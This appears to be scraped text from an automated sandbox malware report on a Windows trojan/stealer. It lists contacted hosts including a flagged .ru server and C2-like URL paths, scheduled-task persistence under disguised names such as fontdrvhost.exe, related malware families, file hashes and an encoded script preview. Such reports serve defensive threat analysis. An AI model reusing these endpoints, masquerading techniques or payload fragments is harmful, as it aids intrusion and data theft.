                                                                                                                                high
                                                                                                                                https://ac.ecosia.org/autocomplete?q=fontdrvhost.exe, 0000001A.00000002.2915469171.0000000012461000.00000004.00000800.00020000.00000000.sdmp, 3iMMnB0sfI.26.dr, J8M2vhPRwT.26.drfalse
                                                                                                                                  high
                                                                                                                                  http://www.fontbureau.com/designers/cabarga.htmlNfontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://www.founder.com.cn/cnfontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://www.fontbureau.com/designers/frere-user.htmlfontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://www.jiyu-kobo.co.jp/fontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://www.fontbureau.com/designers8fontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://support.mozilla.orgdhpSrMBRff.26.drfalse
                                                                                                                                              high
                                                                                                                                              https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesdoH1J2y0cr.26.drfalse
                                                                                                                                                high
                                                                                                                                                http://api.telegram.orgfontdrvhost.exe, 00000004.00000002.1755507962.00000000038A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=fontdrvhost.exe, 0000001A.00000002.2915469171.0000000012461000.00000004.00000800.00020000.00000000.sdmp, 3iMMnB0sfI.26.dr, J8M2vhPRwT.26.drfalse
                                                                                                                                                    high
                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                    • 75% < No. of IPs
                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                    149.154.167.220
                                                                                                                                                    api.telegram.orgUnited Kingdom
                                                                                                                                                    62041TELEGRAMRUfalse
                                                                                                                                                    104.21.38.84
                                                                                                                                                    250345cm.renyash.ruUnited States
                                                                                                                                                    13335CLOUDFLARENETUStrue
                                                                                                                                                    34.117.59.81
                                                                                                                                                    ipinfo.ioUnited States
                                                                                                                                                    139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfalse
                                                                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                    Analysis ID:1583014
                                                                                                                                                    Start date and time:2025-01-01 14:51:04 +01:00
                                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                                    Overall analysis duration:0h 8m 57s
                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                    Report type:full
                                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                    Number of analysed new started processes analysed:39
                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                    Technologies:
                                                                                                                                                    • HCA enabled
                                                                                                                                                    • EGA enabled
                                                                                                                                                    • AMSI enabled
                                                                                                                                                    Analysis Mode:default
                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                    Sample name:YGk3y6Tdix.exe
                                                                                                                                                    renamed because original name is a hash value
                                                                                                                                                    Original Sample Name:e38b0fc914530e6682d067159b0c7c34.exe
                                                                                                                                                    Detection:MAL
                                                                                                                                                    Classification:mal100.troj.spyw.evad.winEXE@40/50@4/3
                                                                                                                                                    EGA Information:
                                                                                                                                                    • Successful, ratio: 14.3%
                                                                                                                                                    HCA Information:Failed
                                                                                                                                                    Cookbook Comments:
                                                                                                                                                    • Found application associated with file extension: .exe
                                                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, services.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 52.149.20.212, 184.28.90.27, 13.107.246.45
                                                                                                                                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                    • Execution Graph export aborted for target FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe, PID 6976 because it is empty
                                                                                                                                                    • Execution Graph export aborted for target FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe, PID 7072 because it is empty
                                                                                                                                                    • Execution Graph export aborted for target FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe, PID 7776 because it is empty
                                                                                                                                                    • Execution Graph export aborted for target fontdrvhost.exe, PID 5012 because it is empty
                                                                                                                                                    • Execution Graph export aborted for target fontdrvhost.exe, PID 6324 because it is empty
                                                                                                                                                    • Execution Graph export aborted for target fontdrvhost.exe, PID 6996 because it is empty
                                                                                                                                                    • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                    • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                    TimeTypeDescription
                                                                                                                                                    08:51:59API Interceptor2344015x Sleep call for process: fontdrvhost.exe modified
                                                                                                                                                    13:51:59Task SchedulerRun new task: FDhouUKjYnvlBIdtOklvQSsmeAjQ path: "C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe"
                                                                                                                                                    13:51:59Task SchedulerRun new task: FDhouUKjYnvlBIdtOklvQSsmeAjQF path: "C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe"
                                                                                                                                                    13:51:59Task SchedulerRun new task: fontdrvhost path: "C:\Drivers\fontdrvhost.exe"
                                                                                                                                                    13:51:59Task SchedulerRun new task: fontdrvhostf path: "C:\Drivers\fontdrvhost.exe"
                                                                                                                                                    13:51:59Task SchedulerRun new task: services path: "C:\Program Files\Internet Explorer\SIGNUP\services.exe"
                                                                                                                                                    13:52:00Task SchedulerRun new task: servicess path: "C:\Program Files\Internet Explorer\SIGNUP\services.exe"
                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                    149.154.167.220Etqq32Yuw4.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                      vEtDFkAZjO.exeGet hashmaliciousRL STEALER, StormKittyBrowse
                                                                                                                                                        Invoice-BL. Payment TT $ 28,945.99.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                                                                          file.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                            XClient.exeGet hashmaliciousXWormBrowse
                                                                                                                                                              Requested Documentation.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                iviewers.dllGet hashmaliciousLummaCBrowse
                                                                                                                                                                  Flasher.exeGet hashmaliciousLuca Stealer, Rusty StealerBrowse
                                                                                                                                                                    i8Vwc7iOaG.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, StormKitty, VidarBrowse
                                                                                                                                                                      INQUIRY.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                        104.21.38.84U1jaLbTw1f.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                        • 891781cm.renyash.ru/ProcessorServerdefaultsqltrafficuniversalwpprivate.php
                                                                                                                                                                        ZZ2sTsJFrt.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                        • 048038cm.renyash.ru/pipepacketprocessGeneratordownloads.php
                                                                                                                                                                        67VB5TS184.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                        • 649521cm.renyash.ru/PipeToJavascriptRequestpollcpubasetestprivateTemp.php
                                                                                                                                                                        gkcQYEdJSO.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                        • 749858cm.renyash.ru/javascriptrequestApiBasePrivate.php
                                                                                                                                                                        34.117.59.81file.exeGet hashmaliciousInvicta Stealer, XWormBrowse
                                                                                                                                                                        • ipinfo.io/json
                                                                                                                                                                        Code%20Send%20meta%20Discord%20EXE.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                        • ipinfo.io/json
                                                                                                                                                                        idl57nk7gk.exeGet hashmaliciousNeshtaBrowse
                                                                                                                                                                        • ipinfo.io/json
                                                                                                                                                                        idl57nk7gk.exeGet hashmaliciousNeshtaBrowse
                                                                                                                                                                        • ipinfo.io/json
                                                                                                                                                                        FormulariomillasbonusLATAM_GsqrekXCVBmUf.cmdGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • ipinfo.io/json
                                                                                                                                                                        172.104.150.66.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                        • ipinfo.io/json
                                                                                                                                                                        VertusinstruccionesFedEX_66521.zipGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • ipinfo.io/json
                                                                                                                                                                        UjbjOP.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                        • ipinfo.io/json
                                                                                                                                                                        I9xuKI2p2B.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                        • ipinfo.io/json
                                                                                                                                                                        licarisan_api.exeGet hashmaliciousIcarusBrowse
                                                                                                                                                                        • ipinfo.io/ip
                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                        ipinfo.ioEtqq32Yuw4.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                        • 34.117.59.81
                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                        • 34.117.59.81
                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                                                                                                                        • 34.117.59.81
                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                                                                                                                        • 34.117.59.81
                                                                                                                                                                        58VSNPxrI4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 34.117.59.81
                                                                                                                                                                        main1.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                                        • 34.117.59.81
                                                                                                                                                                        pyld611114.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 34.117.59.81
                                                                                                                                                                        YF3YnL4ksc.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 34.117.59.81
                                                                                                                                                                        YF3YnL4ksc.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 34.117.59.81
                                                                                                                                                                        https://bu.marcel-andree.de/Get hashmaliciousUnknownBrowse
                                                                                                                                                                        • 34.117.59.81
                                                                                                                                                                        api.telegram.orgEtqq32Yuw4.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                        • 149.154.167.220
                                                                                                                                                                        vEtDFkAZjO.exeGet hashmaliciousRL STEALER, StormKittyBrowse
                                                                                                                                                                        • 149.154.167.220
                                                                                                                                                                        Invoice-BL. Payment TT $ 28,945.99.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                                                                                        • 149.154.167.220
                                                                                                                                                                        file.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                        • 149.154.167.220
                                                                                                                                                                        XClient.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                        • 149.154.167.220
                                                                                                                                                                        Requested Documentation.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                        • 149.154.167.220
                                                                                                                                                                        iviewers.dllGet hashmaliciousLummaCBrowse
                                                                                                                                                                        • 149.154.167.220
                                                                                                                                                                        Flasher.exeGet hashmaliciousLuca Stealer, Rusty StealerBrowse
                                                                                                                                                                        • 149.154.167.220
                                                                                                                                                                        INQUIRY.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                        • 149.154.167.220
                                                                                                                                                                        Technonomic.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                        • 149.154.167.220
                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                        TELEGRAMRUCenteredDealing.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                        • 149.154.167.99
                                                                                                                                                                        CenteredDealing.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                        • 149.154.167.99
                                                                                                                                                                        Etqq32Yuw4.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                        • 149.154.167.220
                                                                                                                                                                        over.ps1Get hashmaliciousVidarBrowse
                                                                                                                                                                        • 149.154.167.99
                                                                                                                                                                        MatAugust.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                        • 149.154.167.99
                                                                                                                                                                        vEtDFkAZjO.exeGet hashmaliciousRL STEALER, StormKittyBrowse
                                                                                                                                                                        • 149.154.167.220
                                                                                                                                                                        Invoice-BL. Payment TT $ 28,945.99.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                                                                                        • 149.154.167.220
                                                                                                                                                                        6684V5n83w.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                        • 149.154.167.99
                                                                                                                                                                        file.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                        • 149.154.167.220
                                                                                                                                                                        XClient.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                        • 149.154.167.220
                                                                                                                                                                        CLOUDFLARENETUShttps://mmm.askfollow.us/#CRDGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 104.17.24.14
                                                                                                                                                                        http://l.instagram.com/?0bfd7a413579bfc47b11c1f19890162e=f171d759fb3a033e4eb430517cad3aef&e=ATP3gbWvTZYJbEDeh7rUkhPx4FjctqZcqx8JLHQOt3eCFNBI8ssZ853B2RmMWetLJ63KaZJU&s=1&u=https%3A%2F%2Fbusiness.instagram.com%2Fmicro_site%2Furl%2F%3Fevent_type%3Dclick%26site%3Digb%26destination%3Dhttps%253A%252F%252Fwww.facebook.com%252Fads%252Fig_redirect%252F%253Fd%253DAd8U5WMN2AM7K-NrvRBs3gyfr9DHeZ3ist33ENX9eJBJWMRBAaOOij4rbjtu42P4dXhL8YyD-jl0LZtS1wkFu-DRtZrPI1zyuzAYXXYv3uJfsc2GuuhHJZr0iVcLluY7-XzYStW8tPCtY7q5OaN0ZR5NezqONJHNCe212u1Fk3V5I6c8mMsj53lfF9nQIFCpMtE%2526a%253D1%2526hash%253DAd_y5usHyEC86F8XGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 104.26.13.60
                                                                                                                                                                        https://t.co/YjyGioQuKTGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 104.21.64.1
                                                                                                                                                                        6a7e35.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 104.21.32.1
                                                                                                                                                                        http://tracking.b2bmktvault.com/tracking/click?d=qPk_c18mu4tAnpVkjkvM74XnWEgCEJFMr0kmnRaZVETZIbfUm-V7axMnjqAoCLnqzaVyNRK36FUkPva8vnzGVvH9cqu1JpLb-vxN3FkjjYhK51_3JrkS14Hcuqb1FOJE1bnSPADYUAMl8knPwYz7btXcOUX9DY4_AjytTbLRGEQ0R8vUhh6vaa-KBtd0YdWGVJFQli_mKczqrYpzYk33dCMwBXQR8R8u2JajJsC51OFcIlRSs_l3i1d9MQf5ZYWuxV_Ytx1pTi2iUY6P97JH0U81Get hashmaliciousUnknownBrowse
                                                                                                                                                                        • 188.114.97.3
                                                                                                                                                                        http://tracking.b2bmktvault.com/tracking/click?d=qPk_c18mu4tAnpVkjkvM74XnWEgCEJFMr0kmnRaZVETZIbfUm-V7axMnjqAoCLnqzaVyNRK36FUkPva8vnzGVvH9cqu1JpLb-vxN3FkjjYhK51_3JrkS14Hcuqb1FOJE1bnSPADYUAMl8knPwYz7btXcOUX9DY4_AjytTbLRGEQ0R8vUhh6vaa-KBtd0YdWGu732v1MZ_EelGtWldAkkdtYGfnD-GIQEN8fgQfvllyKpzr3-J0fwpuBZsUPy3J_TvPM8sfKRevcMTcDv6eAynng1Get hashmaliciousUnknownBrowse
                                                                                                                                                                        • 188.114.97.3
                                                                                                                                                                        OXoeX1Ii3x.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 188.114.96.3
                                                                                                                                                                        OXoeX1Ii3x.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 188.114.97.3
                                                                                                                                                                        vj0Vxt8xM4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 104.20.99.10
                                                                                                                                                                        vj0Vxt8xM4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 104.20.99.10
                                                                                                                                                                        GOOGLE-AS-APGoogleAsiaPacificPteLtdSGhttps://mmm.askfollow.us/#CRDGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 34.117.77.79
                                                                                                                                                                        http://l.instagram.com/?0bfd7a413579bfc47b11c1f19890162e=f171d759fb3a033e4eb430517cad3aef&e=ATP3gbWvTZYJbEDeh7rUkhPx4FjctqZcqx8JLHQOt3eCFNBI8ssZ853B2RmMWetLJ63KaZJU&s=1&u=https%3A%2F%2Fbusiness.instagram.com%2Fmicro_site%2Furl%2F%3Fevent_type%3Dclick%26site%3Digb%26destination%3Dhttps%253A%252F%252Fwww.facebook.com%252Fads%252Fig_redirect%252F%253Fd%253DAd8U5WMN2AM7K-NrvRBs3gyfr9DHeZ3ist33ENX9eJBJWMRBAaOOij4rbjtu42P4dXhL8YyD-jl0LZtS1wkFu-DRtZrPI1zyuzAYXXYv3uJfsc2GuuhHJZr0iVcLluY7-XzYStW8tPCtY7q5OaN0ZR5NezqONJHNCe212u1Fk3V5I6c8mMsj53lfF9nQIFCpMtE%2526a%253D1%2526hash%253DAd_y5usHyEC86F8XGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 34.117.77.79
                                                                                                                                                                        https://t.co/YjyGioQuKTGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 34.117.77.79
                                                                                                                                                                        Etqq32Yuw4.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                        • 34.117.59.81
                                                                                                                                                                        botx.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                        • 34.118.114.163
                                                                                                                                                                        loligang.spc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                        • 34.117.61.150
                                                                                                                                                                        arm.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                        • 34.67.61.212
                                                                                                                                                                        rpDOUhuBC5.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                        • 34.117.188.166
                                                                                                                                                                        rpDOUhuBC5.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                        • 34.117.188.166
                                                                                                                                                                        https://greensofttech1-my.sharepoint.com/:f:/g/personal/stella_huang_greensofttech1_onmicrosoft_com/EuOSopXBEUpFhaHAwqFRDM8BeWLY-Gsl0U9Az2fOy4x80A?e=GhPegT&xsdata=MDV8MDJ8TVB1Z2FAaHljaXRlLmNvbXxjMDM5NmJhZjcxOTM0YzBkMTc3ZDA4ZGQxMzcwNWQ3MnxmYzVjNjhmNjk3ZjM0ZWZlYjY4OWViNWMxMjM0ZjgyMXwwfDB8NjM4Njg4MDk1NTQ0NTA0NzA2fFVua25vd258VFdGcGJHWnNiM2Q4ZXlKRmJYQjBlVTFoY0draU9uUnlkV1VzSWxZaU9pSXdMakF1TURBd01DSXNJbEFpT2lKWGFXNHpNaUlzSWtGT0lqb2lUV0ZwYkNJc0lsZFVJam95ZlE9PXwwfHx8&sdata=SVpsejJNYUlwY213VjNreGxSNU1LaFJXcnpXS3pwWjhYR2k5ZUthLzlsMD0%3dGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                        • 34.117.121.53
                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                        3b5074b1b5d032e5620f69f9f700ff0e1.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                        • 149.154.167.220
                                                                                                                                                                        • 34.117.59.81
                                                                                                                                                                        Let's_20Compress.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 149.154.167.220
                                                                                                                                                                        • 34.117.59.81
                                                                                                                                                                        YJaaZuNHwI.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                                        • 149.154.167.220
                                                                                                                                                                        • 34.117.59.81
                                                                                                                                                                        Etqq32Yuw4.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                        • 149.154.167.220
                                                                                                                                                                        • 34.117.59.81
                                                                                                                                                                        OPRfEWLTto.jsGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 149.154.167.220
                                                                                                                                                                        • 34.117.59.81
                                                                                                                                                                        http://4.lkx91.michaelhuegel.com/news?q=IP%20provider%20is%20blacklisted!%20MICROSOFT-CORP-MSN-AS-BLOCKGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 149.154.167.220
                                                                                                                                                                        • 34.117.59.81
                                                                                                                                                                        over.ps1Get hashmaliciousVidarBrowse
                                                                                                                                                                        • 149.154.167.220
                                                                                                                                                                        • 34.117.59.81
                                                                                                                                                                        http://trezorbridge.org/Get hashmaliciousUnknownBrowse
                                                                                                                                                                        • 149.154.167.220
                                                                                                                                                                        • 34.117.59.81
                                                                                                                                                                        tyPafmiT0t.exeGet hashmalicious44Caliber Stealer, BlackGuard, Rags StealerBrowse
                                                                                                                                                                        • 149.154.167.220
                                                                                                                                                                        • 34.117.59.81
                                                                                                                                                                        vEtDFkAZjO.exeGet hashmaliciousRL STEALER, StormKittyBrowse
                                                                                                                                                                        • 149.154.167.220
                                                                                                                                                                        • 34.117.59.81
                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                        C:\Users\user\Desktop\BimGJlFQ.logU1jaLbTw1f.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                          voed9G7p5s.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                            Etqq32Yuw4.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                              KzLetzDiM8.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                f3I38kv.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                  aimware.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                    ZZ2sTsJFrt.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                      r6cRyCpdfS.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                        tBnELFfQoe.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                          Z4D3XAZ2jB.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                            Process:C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (829), with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):829
                                                                                                                                                                                            Entropy (8bit):5.895863081890059
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12:0LrGPkTpd7uwOQtLOQ3cU3dmdWQikBo3j8EU5QXhiUrDNQS/rtgwJacDzkJ:0Gs1Nu0PrmdAUyXBHNQM9B4J
                                                                                                                                                                                            MD5:7D86DD76C4F0B7FFBDB347CFDACCB2D7
                                                                                                                                                                                            SHA1:659807C29AE5A5A07930725CD536FC3AAF57D28A
                                                                                                                                                                                            SHA-256:62BEBE49D8EAEA8405DADC19E0E30C5BD88C8AD818A9A57B1B1E9EA2293665EB
                                                                                                                                                                                            SHA-512:977E3860BE26C29022329E74D50B8CE29938F9078DD5401C30B0492B57644CE890731EA177B83CF3B69B5FFFA8DAAE948EE59E45D4AEF87F34B31D60EEEB9342
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:enyXBloxCQBNAibqJHUN9U1EUPj1UPjB9V2wrSnsL5gcFmrSHzTav7zJwuCvCwdwq9Ooqo80dmBEyY8shRuf5JQBgsA7Q1pZbuwFXCld0d7J5uVXvUOvC80htMI7nBkl6mnEm2UepRocLGFwXmL5n3Xd3OWL4ozy2VMTGRu39tGuTXVmGWjA0o8DOKKXgJkAc0kz4vpG2S63xmJg3tEiEy8NXIE6GXW0JFSdwfsUqcIhsEQmAoexFB6o1WcvqsAf5GurUqtXAt1lpafT2c5c2juHJolaD6n8cnmlUiSU4GwVKU9b1J3OwhmVVmiqETUEF2JBy38UKlhwxY7zpKi4DZL5BQQr9mQlwrQRK7m7KiEL90i6ptB4uZBqrNAhnQUiV69FIporhkueV95KsTCQlV0Wqkk77FU3Og0D0cxAFTXKpgUrSzzTOE69FnZiErubQ0QzJ2UPfCLR8qqJP2oIPApKj17NDP5Xj53zQfiafkyL2pBY6PTMCmMPLGQR4GLQHxsDw13tUOmpMdR40iRy5sV6tonKPQfYYiEE67mFWj2x9gDsyWbVzXUYcvUINseDtORnYM726LbW0h7Mk5V3zJjBNqmKnd1nFzEuOZTlYiZn58i4yHhRWlNjpQasjwPcTyRBcM7LmteQu5FPIsWf5kQdlfF89kCmT6THqgblJWpmG7yuKKk1Zththxa7H9LBr26yl8ilQvVi5nXnqVxyAKMkZkj3GeeKKn5NAAIMl9koX8y3awQvLXBhqWYAYpewRLXRsJnpMlMAkiMawqcUNs9xmYholIy6exWMkgKQJljkKA6IJ8OrMKjjLkpUm
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YGk3y6Tdix.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):214
                                                                                                                                                                                            Entropy (8bit):5.855036525984412
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6:G3wqK+NkLzWbHY08nZNDd3RL1wQJR62Epa872CeE9s:G+MCzWLY04d3XBJDka8yCeEi
                                                                                                                                                                                            MD5:1284861B32FF60A134809849EA1F67ED
                                                                                                                                                                                            SHA1:5AD5EB3232A79528A7920CE7FB5C7465EFB4AF84
                                                                                                                                                                                            SHA-256:CF2177CC131570B6AD9BB432EA0BAB75157FFA3A2370CB5F6B21FF12B1F533C5
                                                                                                                                                                                            SHA-512:649B46E98D6D8D4E17FE0D3F373F93FA8D8A6E132B9B5F16A04C1FA7EA00E9C9429DF0F1E13343CC2445E63AE82CFCDFC1987A7A53EEAE3E27484BD547A3B5FB
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                            Preview:#@~^vQAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v T!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~JujH/O.:GDk7+u&zGDr\.Dd&Jp?9h(.|%M/sSGD_o8R8CDJSPZSP6lsd.IDwAAA==^#~@.
                                                                                                                                                                                            Process:C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):1991168
                                                                                                                                                                                            Entropy (8bit):7.5618921450859276
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:49152:gj0lqVipoZ4YCZ5I3tChoVtLlNeLi6ZbNIgKZnpN8Z:gj0voZ4YqIdCho9YLi6lG+Z
                                                                                                                                                                                            MD5:BA58757137700B6B304B45298D986EB1
                                                                                                                                                                                            SHA1:9C961405DF61C3F031EAC0B5D045EFA6F4BDDC8B
                                                                                                                                                                                            SHA-256:62B5B15444C303B073C9213E457C7CC4ECC99BC69C850C8350B9F3890C9DD363
